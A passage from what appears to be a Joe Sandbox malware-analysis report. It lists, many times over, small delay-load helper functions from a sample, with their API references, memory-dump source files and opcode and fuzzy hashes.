                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8d34d8ba844eb5dd818ca2d4fb6100e35c9cae605082b0ebd82cd5cad721a0a0
                                                                                              • Instruction ID: eb270f2c8adaddc6bbb6945c9c7986476ad8f08649ad15b212bdc7aaafcf4e6d
                                                                                              • Opcode Fuzzy Hash: 8d34d8ba844eb5dd818ca2d4fb6100e35c9cae605082b0ebd82cd5cad721a0a0
                                                                                              • Instruction Fuzzy Hash: 90B012D5A780007D321471342E03E36016CE0C4B15730843BFC00C8084D4410C091331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F699 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2efb1261dd20c60f5b6f0814604ccfb161dc3ce88e97bfdc1b6844685b4fac6f
                                                                                              • Instruction ID: 3de5fa1a1a489066d69c84bae322b0623d5acc68aecdeffa8d7b020616aa0b8f
                                                                                              • Opcode Fuzzy Hash: 2efb1261dd20c60f5b6f0814604ccfb161dc3ce88e97bfdc1b6844685b4fac6f
                                                                                              • Instruction Fuzzy Hash: 10B012D9A790007D32143120BE03D36012CD8C0B15730843BFC00D808194514C051231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6C8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9304f4a3622f1ccc63135f57d6c8a45150acc1f3776bf26245afc418287025b0
                                                                                              • Instruction ID: 722214fe624e54148a34a358b78e84a4b912d87262bcf1c27a65e232a1a24198
                                                                                              • Opcode Fuzzy Hash: 9304f4a3622f1ccc63135f57d6c8a45150acc1f3776bf26245afc418287025b0
                                                                                              • Instruction Fuzzy Hash: 2EB012D1A780007D321471342D13F36016CE0C4B15730443BFC00C0084D4400C081331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6D2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fc145ac9f2aae7ae52dec4a283a6e8726894d4a7b90e5e102809a4013a1d917f
                                                                                              • Instruction ID: 552b19d643083a6be6acac26b5343ec381e0f5dfba7e97e702db3114564c662a
                                                                                              • Opcode Fuzzy Hash: fc145ac9f2aae7ae52dec4a283a6e8726894d4a7b90e5e102809a4013a1d917f
                                                                                              • Instruction Fuzzy Hash: 99B012D1A78000BD321871242D03E3A017CE0C4B15730843BFC00C5084D4400C081332
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F733 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6492ae3a5a57decc2f8c0a175192f62df99155c111380350b99942372aeb3a1b
                                                                                              • Instruction ID: 2ad00cd69a86ccf8503bfb95a5cd939b2745e3c5cb3e4c962272c2ba4d734417
                                                                                              • Opcode Fuzzy Hash: 6492ae3a5a57decc2f8c0a175192f62df99155c111380350b99942372aeb3a1b
                                                                                              • Instruction Fuzzy Hash: F4B01291A782027D326871242D07F36411CD4C0B117304E3AF800C0040D4400C840331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F73D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0d2abd793481a395d1dbe08809ec4068c36ae65ca8409e183d01c29439a6a39f
                                                                                              • Instruction ID: 4e1475584302b0efeb1e5e41e0502c7f7d19def6a5005bff3d50fab077072735
                                                                                              • Opcode Fuzzy Hash: 0d2abd793481a395d1dbe08809ec4068c36ae65ca8409e183d01c29439a6a39f
                                                                                              • Instruction Fuzzy Hash: 01B01291A781027D322871242D07F3A411CD4C0B11730893AFC00C5044D4400C480231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F71F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8b86b88aca20001c842a82caf62cc4962cc5fd324d4b0bf0dd9f740a88e19ab1
                                                                                              • Instruction ID: 5fbcb1f57de8559e84e2358ede0e2197a89e0f923123afbcee0bde06c9949a06
                                                                                              • Opcode Fuzzy Hash: 8b86b88aca20001c842a82caf62cc4962cc5fd324d4b0bf0dd9f740a88e19ab1
                                                                                              • Instruction Fuzzy Hash: D9B01295A781027D321471242E47F36011CE4C0B11730493AF800C4040D4800D450231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 403610df12fcbca061a5b325da6eb8bd178d58120a6dccc8f4dc26ca0f63b81f
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 403610df12fcbca061a5b325da6eb8bd178d58120a6dccc8f4dc26ca0f63b81f
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: dc3a2cf2260ad873f32644a0e191bf3fd104f6bcc3284f14129f78dea2ff3699
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: dc3a2cf2260ad873f32644a0e191bf3fd104f6bcc3284f14129f78dea2ff3699
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e64effabcf1590eee357d192b2caeb100923572239294a3e1cb02d42e5bc656a
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: e64effabcf1590eee357d192b2caeb100923572239294a3e1cb02d42e5bc656a
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5a9db4a0a365eb986b2ae969f269e54f3030bf15e106dea07a15f497d9e6a31f
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 5a9db4a0a365eb986b2ae969f269e54f3030bf15e106dea07a15f497d9e6a31f
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b16729dcde025a592f6fb2a4ba7fb7a2df947bfa399fcf95ef2cdf8da9e640e7
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: b16729dcde025a592f6fb2a4ba7fb7a2df947bfa399fcf95ef2cdf8da9e640e7
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F373 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 06093ad5f21db5ede242e1b73dc57e43a17944658be290b4749615377dd7d950
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 06093ad5f21db5ede242e1b73dc57e43a17944658be290b4749615377dd7d950
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F427 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
